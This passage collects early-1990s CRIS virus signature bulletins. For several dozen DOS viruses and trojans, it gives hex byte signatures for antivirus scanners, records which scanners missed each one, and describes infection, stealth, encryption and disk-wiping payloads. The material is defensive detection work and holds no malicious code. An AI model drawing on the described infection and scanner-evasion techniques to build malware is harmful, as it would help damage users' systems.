[ ] TBAV 6.08 [x] SCAN 108 + +The Blood Rage Virus is seen in heuristic mode in TBAV and F-PROT, the +signature above will report the 'Blood Rage' Virus in both of these if you +add the string to your scanner. McAfee's Scan reports the correct virus. Tbav +and F-prot report 'Probbly infected with a unknown virus'. Blood Rage will +infect .Com files when A infected file is run. The text below can be seen in +the virus code. + +THE WORLD WiLL NEVER FORGETT US! -Beta Boys- Blood Rage (c)1992 The BetaBoys + + +Virus Name: Demo-Exe Virus Admiral Bailey [YAM] + Notes: EXE COM INF + Signature: 5D81ED03011E060E0E1F078DB653 + +[ ] F-Prot 2.09f [ ] TBAV 6.08 [ ] SCAN 108 + +Little is known about this virus. None of the scanners tested detected +this virus. With the above signature added to your scanner it will be +detected as the Demo-Exe Virus. This is the name given to it in the +virus code. (Demo-Exe Virus Admiral Bailey [YAM]). This is A .EXE infector +adding 334 bytes to each infected file. It will infect three .EXE files +each time an infected file is run. YAM is a virus writing group that +is (was) headed by 'Admiral Baily' Y ouths A gainst M cAfee. It seems that +Admiral Baily has left the virus world for a while and has not been heard +from (according to sources). + + +Virus Name: Handy Virus + Notes: COM EXE SYS INF + Signature: 8CC00500108EC0BE0001BF0000B9 + +[ ] F-Prot 2.09f [x] TBAV 6.08 [ ] SCAN 108 + +Little is known about this virus. TBAV reports unknown virus, no other +scanner can see this file. According to the code this is a .Com infector. +Tested here it seems to also infect Dos System Files. MSDOS.SYS, IBMDOS.SYS +attrib -s -h -r files. After your DOS system is infected, things will never +be the same. Error messages will come up with most every command. 'Divide +Overflow', 'System Halted', Etc... Lockups will become common with flashing +lights and error messages. By adding the above string to your scanner you +can detect this file before you have to experience all of this 'fun'. + +These signature's come from Cris +Computer Research & Information Service +(708) 863-5285 + +* these signature's have passed all testing and worked on all + files that were infected and tested. + + +This virus signature can be added to F-Protect by running f-prot.exe +then use the menu to add the code below. After you add the code, be +sure to scan using the /USER switch. f-prot /user {enter} + +REMEMBER F-prot will only allow 10 user sigs at a time, TBAV will allow +Over 1000. + +You can also add it to TBAV by running tbgensig.exe make a text file +called usersig.dat, then make it look like below. +; +virus name +your notes here +skdjfjdh34585855 {string goes there +; +virus name +your notes here +skdjfjdh34585855 {string goes there +; +run tbgensig.exe + + +-----BEGIN PGP SIGNATURE----- +Version: 2.3a + +iQBVAgUBLOirAqM4CDusTF+9AQHGLQH/bQ4DZ48yzFu+KjEqyogWYtjO16RNbgD3 +GuLtq8uGdsrDDim3HpqbvuCXk1RUa1ZFpV7EcNNIIQx0wN7wEEOWUQ== +=3xAZ +-----END PGP SIGNATURE----- +-----BEGIN PGP SIGNED MESSAGE----- + +Virus Signature Alert! + +Virus Name: Iron Maiden (August 16th) + Notes: COM EXE DROP + Signature: 8CC6060B01C3EBF8B8D9C8D9BADF + +[ ] F-Prot 2.09f [ ] TBAV 6.08 [ ] SCAN 9.20 V109 + +None of the above scanners see this dropper. After this dropper +infects either itself or another file it will be scannable by the +above scanners. Add the signature above and you will not have to +go through the pains of having to mess with this whole thing. + +Iron Maiden will infect two files in the current directory and +then go to drive C: to infect the first two files in the root +directory. If you are running A infected file from the A: and +do not have a hard disk, your machine will lock. If there is a +hard disk the virus will infect two files in the root dir of +your C: and let the infected file continue running. + +This Virus adds 636 Bytes to infected files, and does not change the +date or time. + +Virus Name: [Binary Fission] v1.0 [ML/PS] + Notes: EXE COM LOW INF + Signature: BD?2B83D3DCD21353E3DBB4D5A + +[ ] F-Prot 2.09f [ ] TBAV 6.08 [ ] SCAN 9.20 V109 + +None of the above scanners see this virus. Binary Fission 1.0 is +a memory resident EXE & COM infector written by Memory Lapse from a +virus writing group called Phalcon/Skism. + +When a file infected with this virus is run, the virus will go memory +resident and infect any .Com or .Exe file that is opened, executed or +has any attributes changed. Files will increase 517 bytes in size. +This virus will not infect command.com even after it becomes resident, +command.com is executed. There are no time or date changes. + + +Virus Name: Phasor (1.0) + Notes: COM EXE LOW INF + Signature: BD?233FF8EC7BFE00126803DBD + +[ ] F-Prot 2.09f [ ] TBAV 6.08 [ ] SCAN 9.20 V109 + + +The Phasor (1.0) Virus remains resident in memory in unused portion +of Interrupt Table Starting At Offset 1E0h. When this virus goes +resident it will infect any .Com file that is run adding 230 bytes to +the infected file. There are no time or date changes on infected files. + +Phasor (1.0) was written by Memory Lapse in in Toronto, ON. Canada, and +is not seen by any of the scanners above. If you add the signature above +to your scanner this virus will be detected. + +These signature's come from Cris +Computer Research & Information Service +(708) 863-5285 + +* These signature's have passed all testing and worked on all + files that were infected and tested. + +* Note: If you are using another scanner other then TBAV you may need + to change the signature. For other scanners replace ?# with the + number after ?. ?2 you would change to ????, or ?3 you would change + to ??????, and so on. Replace the ?# with double the ?'s as the number. + +This virus signature can be added to F-Protect by running f-prot.exe +then use the menu to add the code below. After you add the code, be +sure to scan using the /USER switch. f-prot /user {enter} + +REMEMBER F-prot will only allow 10 user sigs at a time, TBAV will allow +Over 1000. + +You can also add it to TBAV by running tbgensig.exe make a text file +called usersig.dat, then make it look like below. +; +virus name +your notes here +skdjfjdh34585855 {string goes there +; +virus name +your notes here +skdjfjdh34585855 {string goes there +; +run tbgensig.exe + + + +-----BEGIN PGP SIGNATURE----- +Version: 2.3a + +iQBVAgUBLO33SqM4CDusTF+9AQFP5AH8CkZKqnFhl2Ae64cUk5sxezLfmEuf6+oo +S/uAEb3rJboQlXlWCCPfEXsHXNqPG7SDwzt4fBnDGrK85hIjgThRxg== +=AWHS +-----END PGP SIGNATURE----- +-----BEGIN PGP SIGNED MESSAGE----- + +Virus Signature Alert! + +- --------------------------------------------------------------------------- +Virus Name: 1984 (TaLoN) + Notes: COM EXE LOW INF +Signatures: TBAV - 33 C0 8E D8 BE ?2 FF 34 FF 74 02 C7 04 + F-Prot - 33 C0 8E D8 BE ?? ?? FF 34 FF 74 02 C7 04 + Scan - 33 C0 8E D8 BE ?? FF 34 FF 74 02 C7 04 + +[ ] F-Prot 2.10 [M] TBAV 6.08 [ ] SCAN 9.20 V109 + +None of the above scanners detect this Virus as of yet. +If you add the above signatures to your scanner, it will be detected. + +1984 from TaLoN ... probably the world's sneakiest virus to date. +TBAV tags it in "high heuristic" mode ... NOTHING else finds it. + +This virus got a write-up in the latest PC Week ... it's being spread in a hack +of SCANV109. You only need to run the hacked SCAN once and you're history ... +it hits every susceptible file on your HD in just one pass! + +It can hit COM/EXE/BIN/OVL/SYS files, the MBR, and 360kB floppy boot sectors. + +It has directory/file/partition stealth. + +Infected files are forward-dated by 100 years. + +By: Rod Fewster +- ---------------------------------------------------------------------------- + +Note: In our tests we find it infecting all of the above, though we did not run +the tests on the the MBR, and 360kB floppy boot sectors yet. This virus is +tricky with the stealth technology it uses. It will disinfect on the fly, so +one minute one file will be infected and the next it will not but another will +be. File size changes are not present while the virus is memory resident, but +if you look when the virus is out of memory you will see a 1979 byte change on +infected files. When the virus first goes memory resident it will look for and +demand C:\DOS\COMMAND.COM and infect this file, though it may disinfect it +latter and infect the command.com file in the root directory of the disk. + +The signature above worked on all samples of infected files tested here. This +virus is not done being researched, but the signature is here so that you can +stop something that may have started in your computer already. + +Michael Paris (Cris) +- -------------------------------------------------------------------------- + +Virus Name: Firefly Virus + Notes: COM EXE LOW INF +Signatures: TBAV - BB ?2 B9 10 01 81 37 ?2 81 77 02 ?2 83 C3 04 E2 F2 + F-Prot - BB ?? ?? B9 10 01 81 37 ?? ?? 81 77 02 ?? ?? 83 C3 04 E2 F2 + Scan - BB ?? B9 10 01 81 37 ?? 81 77 02 ?? 83 C3 04 E2 F2 + +[ ] F-Prot 2.10 [ ] TBAV 6.08 [ ] SCAN 9.20 V109 + +None of the above scanners can detect this virus. If you add the above +signatures to your scanner it will be detected. + +The FIREFLY virus is a memory resident COM file infector. It's most +noticeable feature is the ever-changing keyboard LED's that appears when +the virus is resident in memory. + +Upon execution the virus allocates approximately 4k of memory and hooks +interrupts 21h, 1Ch, and 24h. The old DOS interrupt 21h is moved to +interrupts 1h and 3h to be used in the virus to handle replication. + +Interrupt 21 +============ +If this interrupt is called, the virus checks to see if an open, execute, +or attribute call is being made. If not, the registers are restored and +the old int 21h is called and everything appears as normal. If one of +these functions are being performed, the virus checks to see if it is +a COM file that is being looked at. If it is, the virus infects the +file. The virus also checks the filename passed to the interrupt to see +if an anti-virus program is being accessed. If it is, the virus deletes +the executable. + +Interrupt 1Ch (System Timer Tick) +================================= +When this interrupt is hooked, the light show begins! The virus keeps +track of how many clock ticks have passed. When the count reaches a +certain point, the virus changes which keyboard LED's are lit. This +continues as long as the virus is memory resident. The virus also makes +your typing rather difficult since it constantly shifts between upper +and lower case. + +Encryption +========== +The virus encrypts itself by using the XOR function with two randomly +generated word variables, alternating between the two variables. + +Infection +========= +The first three bytes of the original COM file are stored within the virus +and replaced by a jump instruction that points to the beginning of the +virus code. Viral code is appended to the end of the COM file. The +COM files grow by 1106 bytes once infected and will appear to function +normally. The virus will not re-infect infected executables and it is +smart enough to know whether or not it is already resident. + +DuWayne Bonkoski (Cris) +- ---------------------------------------------------------------------------- + +Virus Name: Adams Family [Men] + Notes: EXE COM LOW INF +Signatures: BB 12 01 FF 27 2A 2E 43 4F 4D 00 2D 3D 41 + +Virus Name: Adams Family [Wendy] + Notes: EXE COM LOW INF +Signatures: BB 12 01 FF 27 2A 2E 43 4F 4D 00 4D 63 41 + +Virus Name: Adams Family [Morticia] + Notes: EXE COM LOW INF +Signatures: BB 12 01 FF 27 2A 2E 43 4F 4D 00 2D 3D 90 + + +[ ] F-Prot 2.10 [ ] TBAV 6.08 [ ] SCAN 9.20 V109 + +None of the above scanners can detect these viruses. If you add the above +signatures to your scanner they will be detected. The signatures above +good for all three AV scanners. + +This is the "Adams Family Collection", Eight viruses total. We were +able to get most of the viruses together into one signature, these are: +Cousin It, Gomez, Lurch, Pugsley, Thing, and Uncle Fester. The other two +Morticia and Wendy have two different Signatures. + +The Adams Family Collection were written by the author of A Variant of the +Butterfly virus 'Crusades'. -DeathBoy KoASP + +These are Resident Com infectors. When a file infected with the Adams virus +is run it will infect other .Com files in the current directory. After the +virus infects a number of .Com files (this is A different number depending +on the virus), it will go memory resident. + +While the virus was in memory i could not get it to infect another file +without running it (though it was resident). When infected files are run +they do replicate. Each file infected will change size depending on which +one is run, Gomez 1648 Bytes, Pugsley 1792 Bytes, Cousin It 1680 Bytes, etc. + +This collection does warrent further research, but this is released so you +can detect this 'weird family' and know a bit about them. + +Michael Paris (Cris) +- --------------------------------------------------------------------------- + +These signature's come from Cris +Computer Research & Information Service +(708) 863-5285 + +* These signature's have passed all testing and worked on all + files that were infected and tested. + +REMEMBER F-prot will only allow 10 user sigs at a time, TBAV will allow +Over 1000. + + +-----BEGIN PGP SIGNATURE----- +Version: 2.3a + +iQBVAgUBLP+AFqM4CDusTF+9AQEHbgH/Rdgwij38YcPbQWlYsFK3en57rD0x0H2d +Cb/jNnRcbjo4NhGmlOiMdhc7l3kv88wIe/Mj0Rx7+f0MkL0VjOHH/w== +=fc7i +-----END PGP SIGNATURE----- +-----BEGIN PGP SIGNED MESSAGE----- + + + +You can freq a complete CRIS TBAV Update signature file from 1:115/863 +with the magic name CRISTBAV + +- - ----------------------------------------------------------------------- +C.R.I.S. New Virus Signature Warning (CrisInfo.009) +- - ----------------------------------------------------------------------- + +Virus Name: [CrisSig] THCK Trojan 2_HERM + Notes: EXE COM TROJ + Signature: BE 03 01 E8 ?2 B2 ?1 E8 ?2*6 FE C2 80 FA 02 + +If you add the above signature to your scanner, it will be detected. + +This file is a simple trojan using the Trojan Horse Construction +Kit (THCK). It seems there are several deliberate bugs in it to create +confusion. It doesn't use Int 13 properly but still accomplishes its +desired task. This is to wipe all possible floppies and hard drives +(The first 128 of each). One of the bugs regards its desired message. +This is variable in length. The desired message is used as the test to +overwrite the first 0-255 sectors of all attached disks. The message is +encrypted. The supplied signature should catch most variants +(cracks/modifications) of this without a complete rewrite of the engine. + +Bill Dirks (C.R.I.S) + +- - ----------------------------------------------------------------------- +Virus Name: [CrisSig] LindaLou + Notes: EXE COM INF + Signature: BA 12 01 8E DA 8C 06 38 00 33 ED E8 E6 0A + +Virus Name: [CrisSig] LindaLou (2) + Notes: EXE COM INF + Signature: BA 75 01 8E DA 8C 06 38 00 33 ED E8 4B 10 + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + TBAV 6.10 : no viruses found + SCAN V111 : no viruses found + +If you add the above signatures to your scanner, they will be detected. + +Lindalou is written by Jackel from the West Coast (Califorina). Lindalou +is a Spawning virus, if A Lindalou infected file is run it will go through +the hard disk and make .Com files for EXE files over 40K in size. No time +or date changes were noticed. No real payload was noticed either (all though +Jackel is known to add payloads to most of his code. + +Michael Paris + +- - ----------------------------------------------------------------------- +Virus Name: [CrisSig] ANTIPRINT + Notes: COM EXE LOW INF + Signature: 00 5D 81 ED 13 00 06 1E B8 41 4E CD 21 3D 45 4D + +If you add the above signature to your scanner, it will be detected. + +ANTIPRINT - This virus is called AntiPrint for a good reason. +If it finds DOS's PRINT installed, it will invoke a disk overwriting +routine to overwrite the first 16 sectors of drive C:. While I +couldn't get it to run on my system the code looks like it will do +what it's suppose to do. This is a resident infecting program. + +Bill Dirks (C.R.I.S) + +- - ----------------------------------------------------------------------- +Virus Name: [CrisSig] Zeuss + Notes: EXE COM INF + Signature: BE ?2 BA 70 01 2E 81 34 ?2 46 46 4A + +F-Prot Signature: BE ?? ?? BA 70 01 2E 81 34 ?? ?? 46 46 4A + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + TBAV 6.10 : might be infected + SCAN V111 : no viruses found + +If you add the above signature to your scanner, it will be detected. + +The Zeuss virus was written by Muja Dib with the help of ARiSToTLE +(so he says in his info). Zeuss is a .COM and .EXE infector that will +add 753 bytes to each infected file. It will infect command.com so files +will be infected with each boot. + +"On the anniversary of ][avoks crash (the 27th of every month) +when an infected file is run, it will wipe out various tracks +of Drive C: and Drive D: and put an Zeuss fact on the screen...)" + +Michael Paris (C.R.I.S) + +- - ----------------------------------------------------------------------- +Virus Name: [CrisSig] Trivial V6 + Notes: EXE COM INF + Signature: BF FD 00 57 B8 F3 A4 AB B0 CC AA BE + +Virus Name: [CrisSig] Trivial V7 + Notes: COM EXE INF + Signature: B9 02 00 0E 1F 5E AD 3D 4D 5A 74 18 3D 5A + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + (V6 says might be trivial) + TBAV 6.10 : no viruses found + SCAN V111 : no viruses found + +If you add the above signature to your scanner, it will be detected. + +V6 & V7 came in as .COM files V7.com and V6.com, Both are Com infectors, +V6 adding only 96 bytes to infected files and V7 416 bytes. These files +do not change time or date stamps on files and they seem to do a good job +of infecting files with one run across the drive. If you add the above +signature to your scanner you can save yourself some restore time if they +happen to make a stop on one of your disks. + +Michael Paris (C.R.I.S) +- - ----------------------------------------------------------------------- + ͻ + Computer Virus Research And Information Service + ͺ + Michael Paris (CRIS) Fido 1:115/863 + P.O BOX 508077 Cris 77:708/0 + Cicero Il. 60600-8077 Voice (708) 863-5472 + BBS (708) 863-5285 FAX (708) 484-5702 +ͻ + FREQ These Magic Names From 1:115/863 + + FILELIST PGPKEY (CrisKey) F-PROT (Latest) + CRIS (Info on Cris) TBAV (Latest) VSUM (Latest) + NODELIST (Cris) SCAN (Latest) THDPRO (Latest) + CRISTBAV (TBAV CrisSig Updates) +ͼ + + + +-----BEGIN PGP SIGNATURE----- +Version: 2.3a + +iQBVAgUBLVXLfqM4CDusTF+9AQHe2AH+PkXzBgNNBJI7ojT6InWn+tiOEzqYne92 +Vs9OhO5QUn5jwCarMBAY0JzzJDtbouC4KQk3ae7HQtf4wWwTCUb2kw== +=Ta+B +-----END PGP SIGNATURE----- +-----BEGIN PGP SIGNED MESSAGE----- + + +C.R.I.S New Virus Signature Warning! CrisInfo #011 + +Because of the possible destructive nature of most of the following, +I ran these on a plain XT w/Dos 5.0 & no Tsrs, etc. to see what they'll +do. It also served the purpose of running about as supseptable a system +as possible. + +This is sort of rushed (72 hours) +and done without gallons of coffee & jolt so here goes. +- ----------------------------------------------------------------------- + +[CrisSig] Aftershock-1 Trojan/Joke +EXE TROJ +BA F9 00 8E DA 8C 06 38 00 33 ED E8 B9 0C + +[CrisSig] Aftershock-2 Trojan/Joke +EXE TROJ +BA B3 01 8E DA 8C 06 4A 00 33 ED E8 2E 0F + +Aftershock 1 & 2 Trojans? - These seem to be jokes. 1 will simply +"act" like it might be doing something but it doesn't do anything +besides display the number 5.2 after acting like its trashing the +hard drive. 2 simply locks the system. While the code looks and +does pick up the Int 13 & 26 code, it does nothing. I ran each of +these about 40+ times with no results of any virus or trojan activity. +This code was written in Pascal. +- ----------------------------------------------------------------------- + +[CrisSig] Earthquake1 Trojan +EXE XHD TROJ +80 00 0A 00 3F 00 12 00 36 04 36 A4 4C 01 00 40 + +[CrisSig] Earthquake2 Trojan +EXE XHD TROJ +F0 00 09 00 2C 00 0D 00 26 04 26 A4 28 01 00 40 + +Earthquake 1 & 2 Trojans - These are just what they claim to be, +simple trojans. Nothing remarkable about them except they were +written in Pascal and work unlike the Aftershock trojans. Part of +this code is identical to what I refer to as stepper trojans. They +start at drive ?? and work backwards to A. An interesting note is +the manner in which the header info was created. Hueristics bypass +the files. It is because of this header a signature can be made. +- ----------------------------------------------------------------------- + +[CrisSig] ESP +COM INF LOW +BB 16 01 CD 11 B8 ?2 BA ?1 00 2E 29 07 + +ESP - This is a resident companion infector of .Exe files. .EXEs will +have a companion .Com that is a mirror of the virus written. These +files are 519 bytes in length. They are hidden and read only. This +virus utilizes variable encryption. The decrypter is fairly static so +its easy to find. It appears to contain no destructive payload in this +and it only appears to replicate based upon the code. To clean a +system, simply delete the .Com campanion files found. +- ----------------------------------------------------------------------- + +[CrisSig] BIG_SKY {1) OR {2} +COM EXE INF +58 0E 50 51 E8 00 00 58 2D 14 00 B1 04 D3 +[CrisSig] BIG_SKY {2} OR {3} +COM EXE INF +26 ?2 84 00 26 ?2 86 00 EB 1F 26 ?2 4C 00 26 ?2 4E 00 + +Big-Sky 1,2,3 - I couldn't get these to do anything other than lock the +system. A disassembly didn't reveal any 80x86 specific code so all I can +assume is Jackel was trying to scare people based upon his Earthquake +trojans and AfterShock jokes. The code does try to hook Int 21 as a +minimum but not really sucessfully here nor 13 & 26. +- ----------------------------------------------------------------------- + +[CrisSig] ITALBOY +COM EXE INF +5E 83 EE 03 B8 01 F2 CD 21 3D F2 01 74 4E + +Italboy - I couldn't get this to replicate on the XT or the 486 no matter +what even though a quick glance at the code says it should work. The +following description is based upon a code analysis. This is basically +a resident .EXE file infector. It has a payload to overwrite the first +256 sectors of the hard disk. It hooks into Int 21 to trap the loading, +executing, and finding of programs. When it finds them, it will then +infect them. The provided signature may or may not work. If the message +" ITALY IS THE BEST COUNTRY IN THE WORLD " appears, your HD has +been overwritten. +- ----------------------------------------------------------------------- + +[CrisSig] NAKED-TRUTH +COM INF +5D 81 ED 0C 01 3E C6 86 F3 02 00 8D B6 05 + +Naked-Truth - This is a direct infector of Command.com and all .COMS. +It appears to do nothing other then replicate. It will attempt to +infect all .Coms in the current directory. If none are found, it will +step back through directories looking for .Coms to infect. Infected +files will show an increase in size of 451 bytes. Infected files will +continue to run. This like Italboy will overwrite the first 256 +sectors of the hard disk on the 11th of any month. +- ----------------------------------------------------------------------- + +[CrisSig] LOCKOUT {1} OR {2} +COM EXE BOOT INF +8C C8 FA 8E D0 BC 00 7C FB 2E 83 2E 13 04 + +Lockout 1 & 2 - These viruses are suppose to be BR infectors. The best +I could manage was a locked system. Their lockout is based upon CMOS +changes. If you have a saved copy of your MBR/PT and CMOS, this should +present no problems. + +Bill Dirks (Cris) +- ----------------------------------------------------------------------- + + + Verified that the sig for the Jizm Trojan is a valid false alarm. Seems +the trojan was originally a .bat compiled to an executable with an unnamed .Bat +to .Com utility. I've got a new sig that's keyed on the original bat contents +instead of the main code. I ran this three times on my system and no problems. +The new sig is. + +[CrisSig] JIZM TROJAN +COM EXE TROJ +64 65 62 75 67 ?4 00 57 20 31 30 30 20 + +Bill Dirks (Cris) +- ----------------------------------------------------------------------- + +Files on "SHAREWARE 1 2 THE MAXX" & "GAMES 2 THE MAXX" CD-ROM DISK! + +I took a quick but decent gander at the archive. It's a nasty joker to +say the least. Unfortunately these some of these same files have been +floating around for awhile but under various names. Here's a quick rundown +of the archive contents. Those without a comment seem OK. + +MWARS BAT 129 07-17-92 6:27a Runs Readthis.com +MWARS20 EXE 28758 02-15-92 2:25a +MWARS20 DOC 6729 07-17-92 6:41a +NOTE DOC 687 01-01-80 12:17a +YANG ME 130 07-17-92 4:15p +INSTALL EXE 54272 06-14-90 4:57p Trojan to kill a PCB BBS +DEMO EXE 9728 04-22-90 8:45p Trojan to trash disk. +DOMENOW COM 4176 09-24-90 9:26p +READTHIS COM 9728 04-22-90 8:45p Trojan to trash disk. + + Note that demo.exe and readthis.com are identical +files but with different extensions. Sigs that will pick these up are. + +REVENGE TROJAN +COM EXE UATE TROJ +BA 2A 01 2E 89 16 F8 01 B4 30 CD 21 8B 2E 02 00 8B + +PCB KILLER TROJAN +EXE COM UATE TROJ +9A 00 00 99 0B 9A 87 04 E5 01 9A 9D 04 E5 01 33 + +Bill Dirks (Cris) +- ----------------------------------------------------------------------- + +-----BEGIN PGP SIGNATURE----- +Version: 2.3a + +iQBVAgUBLWV8b6M4CDusTF+9AQER9gIAmm/m0S8V7TYUU1kVkAd0yEpRlSqZsZvH +KKFNdFn0KEGoAoaTT+eNfxjuYTbGrOpeiM9QWn0B9uwlGs5lxE2hMg== +=yZzJ +-----END PGP SIGNATURE----- +-----BEGIN PGP SIGNED MESSAGE----- + + +Virus Signature Alert! + +- --------------------------------------------------------------------- +Virus Name: [CrisSig] [Data-Rape] 2.1 (Trojan) + Notes: COM EXE TROJ + Signature: BB 03 01 B5 00 B1 00 B6 00 B2 80 CD 13 73 11 + +[ ] F-Prot 2.10C [ ] TBAV 6.09 [ ] SCAN 9.20 V109 + +None of the above scanners detect this file as of yet. +If you add the above signature to your scanner, it will be detected. + +This is a simple trojan and not a virus. It can be mistaken for +one though since it writes itself to the hard disk plus whatever was +in memory at the time. It was written by Zodiac and Data Disrupter +back in 1991 as part of the Rabid group. + +This is part of the info that will be written to disk. +It'll attempt to overwrite no less than the first 69 sectors of +the harddisk. It'll then go after any floppy in the A drive to do +the same. Because of the manner it attempts to overwrite the hard +disk, most XT's HD's shouldn't be affected. Partly depends on the BIOS +and use of Int 13. A standard XT will not all a Long Sector write. + +Bill Dirks +- --------------------------------------------------------------------- + +Virus Name: [CrisSig] Sabbath {Generation 1} + Notes: COM EXE INF + Signature: 1E 75 13 B0 02 B9 20 00 33 D2 CD 26 + +Virus Name: [CrisSig] Sabbath + Notes: COM EXE INF +Signatures: TBAV: B9 43 03 81 3L ?2 83 02 E2 F7 + SCAN: "B94303813L??8302E2F7" [Sabbath] + F-PROT: B94303813L????8302E2F7 + +[ ] F-Prot 2.10C [M] TBAV 6.09 [ ] SCAN 9.20 V109 + +This virus goes TSR. It will basically try to infect anything but the +boot sector. Doesn't matter whether it's executable or not. It does a find +first and goes after the file if not already infected. It captures the +critical error handler so it isn't obvious what it does when it messes up. + +The virus will infect the first file in the directory. There are several +bugs in the code. One of them is that it will infect a file more than once. +This causes problems in detection. What will typically happen is the file +will become infected. It is easily detected at this point. Upon running it +again, it may or may not damage itself by reinfecting the same file. +Basically, if the infection is valid, the strings above will detect it. +Once the virus kills itself by damaging the file, the file is no longer +infectious or executeable but no longer detectable due to the damage. + +Bill Dirks +- --------------------------------------------------------------------- + +Virus Name: [CrisSig] Quadratic Equation II (Generation 1) + Notes: EXE COM LOW DROP + Signature: BD 00 00 1E 06 B4 3F BB FF FF CD 21 3D FF + +Virus Name: [CrisSig] Quadratic Equation II + Notes: EXE COM LOW INF +Signatures: TBAV: BH DA 04 2E 30 ?2 E2 FA + SCAN: "BHDA042E30??E2FA" [Quadratic Equation II] + F-PROT: BH DA 04 2E 30 ?? ?? E2 FA + +[M] F-Prot 2.10C [M] TBAV 6.09 [ ] SCAN 9.20 V109 + +None of the above scanners detect this Virus as of yet. +If you add the above signature to your scanner, it will be detected. + +Quadratic Equation II is a memory resident com and exe infector that +will become memory resident when the first infected file runs. When +the virus is memory resident it will infect any com or exe file that +is run. (Including command.com) There will be no time or date changes. +Infected files will change in size 15 bytes while the virus is active +in system memory, if the virus is removed from memory the files will +show the true size change of 1285 bytes. The signatures above have been +tested and proved to work on all tested files. + +Michael Paris +- --------------------------------------------------------------------- + +Virus Name: [CrisSig] YB-5 (Handsome) + Notes: COM INF + Signature: EB 00 C3 8D 94 8E 01 B4 4E B9 3F 00 CD 21 + + +[ ] F-Prot 2.10C [M] TBAV 6.09 [ ] SCAN 9.20 V109 + +YB-5 is a com infector that adds 466 bytes to infected files. The source +code claims "AUTHOR: Khntark; surgeon: Urnst Kouch". This virus is a +demonstrator for the YB-5 code segment. It is sufficient to get by +F-Prot's 'heuristic'mode, but does not get past TBScan's heuristic mode. +TBScan reports a possible infection. + +The above signature works on all samples tested here. By adding this +signature you will be able to detect this virus and all infected files. + +Michael Paris +- --------------------------------------------------------------------- + +Virus Name: [CrisSig] DK - (Generation 1) + Notes: EXE COM DROP + Signature: 83 EC 10 83 E4 E0 8B EC 50 BE 05 01 03 36 + +Virus Name: [CrisSig] DK + Notes: EXE COM INF +Signatures: TBAV: B9 B6 01 BB ?2 2E 81 07 ?2 83 C3 02 E2 F6 + SCAN: "B9B601BB??2E8107??83C302E2F6" [DK] + F-PROT: B9B601BB????2E8107????83C302E2F6 + +[ ] F-Prot 2.10C [M] TBAV 6.09 [ ] SCAN 9.20 V109 + +Note: The first generation signature is known to give a false positive +in some cases, The DK infection has been tested with none. Both signatures +worked on all files infected and tested here. + +The DK virus is a encrypting, non-memory resident, non stealth virus +The first time a file infected with the DK virus is executed the systems +date will be changed to 1994 and two files in the current directory will be +infected, one EXE and one COM. If the virus can't find two uninfected files +then it will search for alternate directories. The DK virus is no real +threat because it does no real damage except infecting files which currently +have to be deleted to clean the virus off of the system and change in the +system date from XX/XX/XXXX to XX/XX/1994. Due to this fact the viruses +presence can be easily detected also Viruscan identifies it as the TridenT +virus. + +I have created a signature for this virus which can easily detect it +by using McAfees Viruscan. This signature is "B9B601BB??2E8107??83C302E2F6" +these are the bytes which remain constent after the encryption of the virus +each time. I have tested it and it doesn't seem to have any conflicts with +any other programs. + +Shaun Debow +- --------------------------------------------------------------------- + +These signature's come from Cris +Computer Research & Information Service +(708) 863-5285 (BBS) + +* These signature's have passed all testing and worked on all + files that were infected and tested. + +REMEMBER F-prot will only allow 10 user sigs at a time, Scan under 250 +TBAV will allow Over 1,500. + +-----BEGIN PGP SIGNATURE----- +Version: 2.3a + +iQBVAgUBLR6AhqM4CDusTF+9AQGbaQH/Zo64j/KsVJcjUX4rayxYZQXaILvJlCRW +I9LUNA0J3YxYj/Wrz3gmECUU+bohF9U3IK73ZiNUQTnUdvpTR1ZqnA== +=raZ2 +-----END PGP SIGNATURE----- +-----BEGIN PGP SIGNED MESSAGE----- + + +C.R.I.S. New Virus Signature Warning (CrisInfo.008) + +- ------------------------------------------------------------------------- +Virus Name: [CrisSig] Acid Trip + Notes: EXE COM LOW INF + Signature: 81 F9 00 0C 75 21 B4 0F CD 10 3C 03 75 19 + +If you add the above signature to your scanner, it will be detected. + +F-Prot 2.10C : No viruses or suspicious files/boot sectors were found. + TBAV 6.10 : No viruses found. + SCAN V111 : No viruses found. + +Acid Trip is a resident .EXE infector. (You will need to include .COM +infection if you want it to pick up to original Acid Trip). It infects upon +file execution. Infected files will have a file size increase of 694 bytes, +however this increase will be hidden while the virus is resident in memory. +The Acid Trip virus will at 12:00pm of any day cause the monitor to rapidly +scroll through the color pallete. It will display the following message" +Your PC is on an [Acid Trip]... try again later... +However on the test system the virus just displayed the message and then +hung the system, so you might get varied results on varied hardware. The +virus contains no intentionally damaging code. The virus contains the +following messages: +Crypt Keeper P/S Your PC is on an [Acid Trip]... Try again later... + +William Chapman [Cris] + +- ------------------------------------------------------------------------- +Virus Name: Greetings Virus + Notes: COM EXE LOW INF + Signature: E8 00 00 5D 81 ED 03 00 E8 + +If you add the above signature to your scanner, it will be detected. + +Scanning Results +- ------------------------------------------------------------------------- +TBAV 6.10 - Undetected +Mcafee's ViruScan Version 111 - Undetected +File had to be deleted +Norton Antivirus Version 3.0 - Undetected +File had to be deleted +F-Prot Ver 2.10c - Unknown Virus (Original File Only) + Note: Infected Files Not Detected +File had to be deleted +Virus Terminator - Undetected +File had to be deleted +VirusCure - Undetected +File had to be deleted +- ------------------------------------------------------------------------- +Extra Information Found on Greetings Virus +- ------------------------------------------------------------------------- +Virus : The Greetings Virus +Author / Modification By : Admiral Bailey +Language Used : Assembly Language [TASM 2.0] +Type of Virus : Encrypted TSR com/exe infector. +Date Of Release : 1-2-93 + +- ------------------------------------------------------------------------- +Some Notes: +This is a TSR com/exe infector. Between certain times it will display +a bouncing ball. Both on graphics (which it will ruin) and in text. +When you reboot during a certain time it shall display a certain messege. +Researchers Notes +The Greetings virus infects Com and Exe files and is memory resident. The +virus uses 2.2 K of RAM. On execution of the original virus Com file, the +words (Hello World...) will be displayed. Interrupts hooked are 08,09, and +21. The Greetings virus will infect the Command.Com file if executed. The +words (Hello World...) can't be found in infected files or in memory. +- -------------------------------------------------------------------------- +Interrupt 08 System Timer. + +Interrupt 09 Keyboard Hardware. +This Interrupt is invoked anytime a key is pressed and released. +The Greetings virus will lock up the keyboard. + +Interrupt 21 DOS Functions. Allows the virus to use over 100 functions. + +Infection +Infected Com and Exe files will have an increase in file size of 1,118 +bytes. The virus will only infect the Command.Com file if executed. +Infected files have no change to date and time. + +Encryption +Encryption by this virus is fairly 